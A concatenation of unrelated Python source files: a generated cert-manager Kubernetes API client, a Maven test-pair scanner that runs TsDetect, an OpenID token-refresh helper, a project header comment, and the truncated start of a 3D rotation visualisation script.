>>> thread = api.replace_namespaced_certificate_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_certificate_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_certificate_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_status # noqa: E501
replace status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_certificate_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_certificate_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_issuer(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_issuer # noqa: E501
replace the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_issuer(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_issuer_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_issuer_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_issuer # noqa: E501
replace the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_issuer_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_issuer`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_issuer_status(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_issuer_status # noqa: E501
replace status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_issuer_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_issuer_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_issuer_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_issuer_status # noqa: E501
replace status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_issuer_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Issuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
|
import logging
import re
import subprocess
from collections import OrderedDict
from pathlib import Path
from typing import Dict, List, Optional, Set, Tuple
import pandas as pd
from effectiveness.code_analysis.get_commit import get_last_commit_id
from effectiveness.code_analysis.pom_module import CutPair, PomModule
from effectiveness.pom_utils import ET, POM_NSMAP
from effectiveness.settings import SCAN_PROJECT_DIR, TSDETECT_DIR, TSDETECT_JAR
special_cases = {
'core': ('/src/', '/test/'),
'guava': ('/src/', '/guava-tests/test/'),
'guava-gwt': ('/src/', '/test/'),
}
IGNORED_SUBMODULES: Dict[str, Set[str]] = {
"opengrok": {"opengrok-tools", "distribution"},
}
def filter_submodule_exceptions(project: str, modules: List[str]) -> List[str]:
try:
return list(set(modules) - IGNORED_SUBMODULES[project])
except KeyError:
return modules
def get_submodules(project_path: Path) -> List[str]:
"""
Analyzes the structure of the project and detect whether more modules are present
Returns:
list of submodules
"""
pom_path = project_path / 'pom.xml'
assert pom_path.exists()
pom_parsed = ET.parse(pom_path)
modules = pom_parsed.find('pom:modules', POM_NSMAP)
modules_list = []
if modules:
for module in modules.findall('pom:module', POM_NSMAP):
detected_module = module.text
if 'xml' not in detected_module:
modules_list.append(detected_module)
logging.info(f'Found {len(modules_list)} module(s):\n', modules_list)
return filter_submodule_exceptions(project_path.name, modules_list)
def search_project_tests(project_path: Path, results_dir=SCAN_PROJECT_DIR):
submodules = get_submodules(project_path)
if submodules:
submodule_cuts = {}
for submodule in submodules:
submodule_path = project_path / submodule
cuts = search_module_tests(
project_path,
project_path.name,
submodule_path,
submodule,
results_dir=results_dir,
)
submodule_cuts[submodule] = cuts
total_tests = sum(len(cuts) for cuts in submodule_cuts.values())
print(f"Total tests for {project_path.name}: {total_tests}")
for submodule, cuts in submodule_cuts.items():
print(f" - {submodule}: {len(cuts)}")
else:
search_module_tests(
project_path, project_path.name, project_path, results_dir=results_dir
)
def search_module_tests(
project_path: Path,
project_name: str,
module_path: Path,
module_name: str = None,
results_dir: Path = SCAN_PROJECT_DIR,
) -> List[CutPair]:
"""Scan a project and save CUTs with their tests to a file"""
pom = module_path / 'pom.xml'
if not pom.exists():
return []
if module_name:
full_name = f"{project_name}/{module_name}"
else:
full_name = project_name
print(f"* Scanning {full_name}")
print(f"* * Found pom: {pom}")
tree = ET.parse(pom)
root = tree.getroot()
include_patterns = []
exclude_patterns = []
surefire_plugin = root.find(
".//pom:plugin/[pom:artifactId='maven-surefire-plugin']", POM_NSMAP
)
if surefire_plugin is None:
if module_path != project_path:
print("* * * Couldn't find maven-surefire-plugin in pom")
print("* * * Searching parent pom")
parent_pom = project_path / 'pom.xml'
if parent_pom.exists():
print(f"* * * Found parent pom: {parent_pom}")
surefire_plugin = (
ET.parse(parent_pom)
.getroot()
.find(".//pom:plugin/[pom:artifactId='maven-surefire-plugin']", POM_NSMAP)
)
if surefire_plugin is None:
print("* * * Couldn't find maven-surefire-plugin in any pom")
else:
print("* * maven-surefire-plugin found")
includes = surefire_plugin.findall('.//pom:include', POM_NSMAP)
for include in includes:
include_patterns.append(include.text)
excludes = surefire_plugin.findall('.//pom:exclude', POM_NSMAP)
for exclude in excludes:
exclude_patterns.append(exclude.text)
DEFAULT_INCLUDES = [
"**/*Test.java",
"**/Test*.java",
"**/*Tests.java",
"**/*TestCase.java",
]
print("* * Found include patterns:", include_patterns)
if not include_patterns:
include_patterns = DEFAULT_INCLUDES
else:
for i in reversed(range(len(include_patterns))):
pat = include_patterns[i]
if pat.endswith("AllTests.java"):
# TODO: parse AllTests.java
print("* * * AllTests.java file found in includes!")
if len(include_patterns) == 1:
include_patterns = DEFAULT_INCLUDES
break
else:
del include_patterns[i]
include_patterns = list(set(include_patterns))
print("* * Adjusted include patterns:", include_patterns)
source_directory, test_source_directory = get_source_directories(
module_path,
project_name,
module_name,
)
module = PomModule(project_name, module_name, include_patterns, exclude_patterns)
# special case for guava
if project_name == 'guava' and not module_path.endswith('gwt'):
tests_path = module_path.parent / test_source_directory
else:
tests_path = module_path / test_source_directory
main_path = module_path / source_directory
print("* * Main path:", main_path)
print("* * Tests path:", tests_path)
# TODO: remove duplicate test entries
test_pairs = list(module.find_cut_pairs(tests_path, main_path))
print(f"* * - {full_name}: Found {len(test_pairs)} class-test pairs")
cut_pairs_to_csv(test_pairs, module_path, module, results_dir)
# TODO: move to separate file
pairs_to_tsdetect_csv(test_pairs, project_name, results_dir)
tsdetect_analyze_project(project_name, input_dir=results_dir)
merge_tsdetect_files()
return test_pairs
def tsdetect_analyze_project(
project_name: str,
*,
input_dir: Path = SCAN_PROJECT_DIR,
output_dir: Path = TSDETECT_DIR / "projects",
):
print(f"* * Running TsDetect on {project_name}")
subprocess.run(
[
"java",
"-jar",
TSDETECT_JAR,
input_dir / f"tsDetect_{project_name}.csv",
],
check=True,
)
output_file = Path.cwd() / f"TsDetect_{project_name}.csv"
output_file.rename(output_dir / output_file.name)
def pairs_to_tsdetect_csv(
test_pairs: List[CutPair], projectName: str, output_dir: Path = SCAN_PROJECT_DIR
):
project = [projectName] * len(test_pairs)
path_test = [test_pair.test_path for test_pair in test_pairs]
path_src = [test_pair.source_path for test_pair in test_pairs]
frame = pd.DataFrame(
OrderedDict(
(
('project', project),
('path_test', path_test),
('path_src', path_src),
)
)
)
output_file = output_dir / f"tsDetect_{projectName}.csv"
print("* * Saving output for tsDetect to", output_file)
frame.to_csv(output_file, index=False, header=False)
def merge_tsdetect_files(
*, input_dir: Path = TSDETECT_DIR / "projects", output_dir: Path = TSDETECT_DIR
):
print(f"* * Merging tsDetect csvs in {input_dir}")
all_files = input_dir.glob("TsDetect_*.csv")
frame = pd.concat(
map(pd.read_csv, all_files),
ignore_index=True,
)
output_file = output_dir / "test-smells.csv"
frame.to_csv(output_file, index=False)
print(f"* * Done merging to {output_file}")
def cut_pairs_to_csv(
test_pairs: List[CutPair],
module_path: Path,
module: PomModule,
output=SCAN_PROJECT_DIR,
):
last_commit = get_last_commit_id(module_path)
project = [module.project_name] * len(test_pairs)
module_col = [module.name] * len(test_pairs)
test_path = [test_pair.test_path for test_pair in test_pairs]
test_name = [test_pair.test_qualified_name for test_pair in test_pairs]
class_path = [test_pair.source_path for test_pair in test_pairs]
src_name = [test_pair.source_qualified_name for test_pair in test_pairs]
frame = pd.DataFrame(
OrderedDict(
(
('project', project),
('module', module_col),
('commit', last_commit),
('test_path', test_path),
('test_name', test_name),
('class_path', class_path),
('class_name', src_name),
)
)
)
old_output = output / f"res_{module.name}.csv"
latest = output / module.project_name / "latest"
output = output / module.project_name / last_commit
output.mkdir(exist_ok=True, parents=True)
if not latest.is_symlink() and latest.is_dir():
import shutil
shutil.rmtree(latest)
latest.unlink(missing_ok=True)
latest.symlink_to(output.relative_to(latest.parent), target_is_directory=True)
filename = f"tests_{module.name or module.project_name}.csv"
print("* * Saving CUTs to", output / filename)
frame.to_csv(old_output, index=False)
frame.to_csv(output / filename, index=False)
def load_cut_pairs(path: Path) -> Optional[Tuple[str, str, List[CutPair]]]:
"""Loads CUT data from `path`
Returns:
(project_name, module_name, list_of_cuts)
or None if there's no data
"""
data = pd.read_csv(path)
if data.empty:
return None
project = data["project"].unique()
assert len(project) == 1, f"{path} should contain data for one project"
module = data["module"].fillna('').unique()
assert len(module) == 1, f"{path} should contain data for one module"
return (
project[0],
module[0],
[
CutPair(test_path, test_qualified_name, source_path, source_qualified_name)
for test_path, test_qualified_name, source_path, source_qualified_name in data[
["test_path", "test_name", "class_path", "class_name"]
].itertuples(index=False)
],
)
def get_source_directories(
module_path: Path, project_name: str, module_name: str
) -> Tuple[str, str]:
"""Return the source and test source directory from the pom (or one of the poms)"""
try:
look_for = project_name if not module_name else module_name
return special_cases[look_for]
except KeyError:
pass
pom_paths = list(module_path.glob('pom*.xml'))
override_source = look_for_tag(pom_paths, 'sourceDirectory', direct_children_of="build")
override_test_source = look_for_tag(
pom_paths, 'testSourceDirectory', direct_children_of="build"
)
# check the test dir and the source dir
test_dir = 'src/test/java' if override_test_source is None else override_test_source
test_dir = test_dir.strip('/')
src_dir = 'src/main' if override_source is None else override_source
src_dir = src_dir.strip('/')
return src_dir, test_dir
def look_for_tag(
poms: List[Path], tag: str, *, children_of: str = None, direct_children_of: str = None
) -> Optional[str]:
"""Return string content of a tag in one of the supplied poms"""
for pom in poms:
pom = ET.parse(pom).getroot()
if children_of:
pattern = f".//pom:{children_of}//pom:{tag}"
elif direct_children_of:
pattern = f".//pom:{direct_children_of}/pom:{tag}"
else:
pattern = f".//pom:{tag}"
element = pom.find(pattern, POM_NSMAP)
if element is not None:
return re.sub("[$@*}?].*[$@*}?]", "", element.text)
return None
if __name__ == '__main__':
def main():
from sys import argv, exit
if len(argv) < 2:
print(f"Error! Usage: {argv[0]} <project_path> [<result_path>]")
exit(1)
search_project_tests(*map(Path, argv[1:3]))
main()
|
"""Useful functions."""
import logging
import os
import sys
from configparser import ConfigParser, RawConfigParser
from datetime import datetime
from json import loads
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen
logger = logging.getLogger("Token manager")
class ClassProperty:
"""
Decorator that allows get methods like class properties.
"""
def __init__(self, fget):
self.fget = fget
def __get__(self, owner_self, owner_cls):
return self.fget(owner_cls)
classproperty = ClassProperty
class TokenManager:
"""
Class for token managing.
Simple usage:
print(TokenManager.id_token)
print(TokenManager.access_token)
Requires dataload.ini with:
[CONNECTION]
token_endpoint = <token_endpoint_url>
retries = <retries_count>
Requires "REFRESH_TOKEN", "CLIENT_ID", "CLIENT_SECRET" in environment variables
"""
_config = ConfigParser()
_config.read("config/dataload.ini")
expire_date = 0
try:
_retries = _config.getint("CONNECTION", "retries")
_token_endpoint = _config["CONNECTION"]["token_endpoint"]
except KeyError as e:
logger.error(f"'{e.args[0]}' should be in dataload.ini")
sys.exit(0)
try:
_refresh_token = os.environ["REFRESH_TOKEN"]
_client_id = os.environ["CLIENT_ID"]
_client_secret = os.environ["CLIENT_SECRET"]
except KeyError as e:
logger.error(f"Environment should have variable '{e.args[0]}'")
sys.exit(0)
@classproperty
def id_token(cls):
"""
Check expiration date and return id_token.
"""
if datetime.now().timestamp() > cls.expire_date:
cls.refresh()
return cls._id_token
@classproperty
def access_token(cls):
"""
Check expiration date and return access_token.
"""
if datetime.now().timestamp() > cls.expire_date:
cls.refresh()
return cls._access_token
@classmethod
def refresh(cls):
"""
Refresh token and save them into class.
"""
logger.info(f"Refreshing token.")
for i in range(cls._retries):
# try several times if there any error
try:
resp = cls.refresh_request(
cls._token_endpoint, cls._refresh_token, cls._client_id, cls._client_secret)
except HTTPError:
if i == cls._retries - 1:
# too many errors, raise original exception
raise
cls._id_token = resp["id_token"]
cls._access_token = resp["access_token"]
cls.expire_date = datetime.now().timestamp() + resp["expires_in"]
logger.info(f"Token is refreshed.")
@staticmethod
def refresh_request(url: str, refresh_token: str, client_id: str, client_secret: str) -> dict:
"""
Send refresh token requests to OpenID token endpoint.
Return dict with keys "access_token", "expires_in", "scope", "token_type", "id_token".
"""
body = {
"grant_type": "refresh_token",
"refresh_token": refresh_token,
"client_id": client_id,
"client_secret": client_secret,
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = urlencode(body).encode("utf8")
request = Request(url=url, data=data, headers=headers)
try:
response = urlopen(request)
response_body = response.read()
return loads(response_body)
except HTTPError as e:
code = e.code
message = e.read().decode("utf8")
logger.error(f"Refresh token request failed. {code} {message}")
raise
def get_token(config: RawConfigParser) -> str:
"""
Refresh access or id token depending on config settings.
:param RawConfigParser config: config that is used in calling module
:return: token of requested type
:rtype: str
"""
token_type = config.get("CONNECTION", "token_type")
tokens_dict = {
"access_token": TokenManager.access_token,
"id_token": TokenManager.id_token
}
if token_type not in tokens_dict.keys():
logger.error(f"Unknown type of token {token_type}. Set correct token type in config file.")
sys.exit(2)
return tokens_dict.get(token_type)
def get_headers(config: RawConfigParser) -> dict:
"""
Get request headers.
:param RawConfigParser config: config that is used in calling module
:return: dictionary with headers required for requests
:rtype: dict
"""
return {
"Content-Type": "application/json",
"data-partition-id": config.get("CONNECTION", "data-partition-id"),
"Authorization": f"Bearer {get_token(config)}"
}
|
#################################################################################
## Project : AuShadha
## Description : Provides the UI app for AuShadha. The Core UI and its elements.
## Date : 15-10-2013
##
## This code is generously borrowed from Django's own admin app
##
## See django.contrib.admin.__init__.py for details on how the parent applications
## sets it up
#################################################################################
|
from pathlib import Path
import torch
import numpy as np
import argparse
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
from mpl_toolkits.mplot3d import Axes3D # https://stackoverflow.com/a/56222305
from scipy.spatial.transform import Rotation as R
from post.plots import get_figa
from mvn.mini import get_config
from mvn.pipeline.setup import setup_dataloaders
from mvn.utils.multiview import build_intrinsics, Camera
from mvn.utils.tred import get_cam_location_in_world, apply_umeyama, rotz, rotation_matrix2axis_angle
from mvn.pipeline.ours import PELVIS_I
from mvn.models.loss import KeypointsMSESmoothLoss, GeodesicLoss
def viz_geodesic():
""" really appreciate https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.transform.Rotation.html """
def _gen_some_eulers():
return np.float64([])
rots = torch.cat([
# rotx(torch.tensor(np.pi / 2)).unsqueeze(0),
# roty(torch.tensor(np.pi / 3)).unsqueeze(0),
rotz(torch.tensor(np.pi / 2)).unsqueeze(0),
torch.tensor(R.random().as_matrix()).unsqueeze(0),
torch.tensor(R.random().as_matrix()).unsqueeze(0),
torch.tensor(R.random().as_matrix()).unsqueeze(0),
])
distances = GeodesicLoss()._criterion(
rots.float(),
torch.eye(3, 3).repeat(rots.shape[0], 1, 1).float().to(rots.device)
)
angle_axis = rotation_matrix2axis_angle(rots)
fig = plt.figure(figsize=plt.figaspect(1.5))
axis = fig.add_subplot(1, 1, 1, projection='3d')
for aa, dist, color in zip(
angle_axis.numpy(),
distances.numpy(),
mcolors.TABLEAU_COLORS):
label = 'rotate by {:.0f}° along [{:.1f}, {:.1f}, {:.1f}]: geodesic distance {:.2f}'.format(
np.degrees(aa[-1]), aa[0], aa[1], aa[2], dist
)
axis.plot(
[0, aa[0]], # from origin ...
[0, aa[1]],
[0, aa[2]], # ... to vec
label=label,
color=color
)
# show axis
axis.quiver(
0, 0, 0,
1, 0, 0,
normalize=True,
color='black',
linestyle='--'
)
axis.quiver(
0, 0, 0,
